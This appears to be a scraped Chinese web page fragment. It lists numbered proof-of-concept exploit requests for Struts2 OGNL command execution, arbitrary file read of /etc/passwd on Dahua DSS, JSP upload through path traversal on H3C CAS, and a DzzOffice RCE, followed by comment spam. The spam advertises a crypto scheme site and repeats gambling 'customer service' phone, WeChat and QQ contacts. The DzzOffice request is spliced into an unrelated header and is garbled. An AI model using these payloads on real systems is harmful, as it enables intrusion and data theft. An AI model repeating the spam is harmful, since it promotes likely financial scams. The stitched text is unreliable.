Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().cear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" boundary=----WebKitFormBoundaryXx80aU0pu6vrsV3z
Referer: http://127.0.0.1:8080/struts2-showcase/fileupload/upload.action
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=8B365C019F676093D27D8C0D21439C2B
Connection: close
------WebKitFormBoundaryXx80aU0pu6vrsV3z
Content-Disposition: form-data; name="upload"; filename="2.txt"
Content-Type: text/plain
asd
------WebKitFormBoundaryXx80aU0pu6vrsV3z
Content-Disposition: form-data; name="caption"
1
------WebKitFormBoundaryXx80aU0pu6vrsV3z—139、大华 DSS 视频管理平台任意文件读取漏洞
/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd140、H3C CAS 虚拟化管理系统 前台任意文件上传漏洞
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/uploadtest233.jsp&name=333 HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Range: bytes 0-10/20
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: JSESSIONID=D0BAB5DEA9AB89BAEE23A8D61D5E1311;JSESSIONID=74E97FDC12BCA4DE576D14777020DF91
Connection: close
Content-Length: 31
<%out.print("uploadsuccess");%>141、DzzOffice RCE
通过随机数安全得到 authkey,加密后,发送 payload
POST /core/api/wopi/index.php?access_token=1&action=contents&path=MTQxZGw4UWs2YmEwcUswVWMwYzNkcVprcXc2NWNaeERVZWIxZmNJMGVSQ2NGbTBUTUFzSTJmc1c1LTczRGFEZDZHNDFxRU13WXFEeDEwdFJNb28= HTTP/1.1
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJiYW9iYW8tdXNlciIsImlhdCI6MTY4NjIyODQ0NCwiZXhwIjoxNjg2MjUwMDQ0LCJpZCI6IjMiLCJuYW1lIjoidGVzdCIsInJvbGVzIjoiMCJ9.h8vnwTPkaTRet53k8eyXqCRRowraZ-An69WjNEB8ikU; ziCQ_2132_auth=b389-XGLCreLr47EADvzniIOSoe-LaFczEggiR2p;ziCQ_2132_lastact=1691549987%09index.php%09; ziCQ_2132_lastvisit=1691546387;ziCQ_2132_saltkey=PB4ZSXjz; ziCQ_2132_sid=xmvOOhspring.cloud.function.definition: reverseString
Content-Type: text/plain
User-Agent: PostmanRuntime/7.32.3
Accept: */*
Postman-Token: 44091cc3-1c62-4ebd-8348-df9bc5d4ed8b
Host: 127.0.0.1:8888
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 18
<?php phpinfo();?>
论点鲜明,论据链环环相扣,论证有力。
这篇文章不错!
新车首发,新的一年,只带想赚米的人coinsrore.com
2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
新车首发,新的一年,只带想赚米的人coinsrore.com
新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
新车上路,只带前10个人coinsrore.com
新盘首开 新盘首开 征召客户!!!coinsrore.com
新项目准备上线,寻找志同道合的合作伙伴coinsrore.com
新车即将上线 真正的项目,期待你的参与coinsrore.com
新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com
如何申请华纳公司账户?
华纳东方明珠开户专线联系方式?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠客服电话是多少?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠开户专线联系方式?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
如何联系华纳东方明珠客服?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠官方客服联系方式?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠客服热线?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠开户客服电话?(▲182(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠24小时客服电话?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠客服邮箱?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠官方客服在线咨询?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠客服微信?(▲18288362750?《?微信STS5099? 】【╃q 2704132802╃】
华纳东方明珠客服电话是多少?(▲18288362750?《?微信STS5099? 】
如何联系华纳东方明珠客服?(▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服联系方式?(▲18288362750?《?微信STS5099?
华纳东方明珠客服热线?(▲18288362750?《?微信STS5099?
华纳东方明珠24小时客服电话?(▲18288362750?《?微信STS5099? 】
华纳东方明珠官方客服在线咨询?(▲18288362750?《?微信STS5099?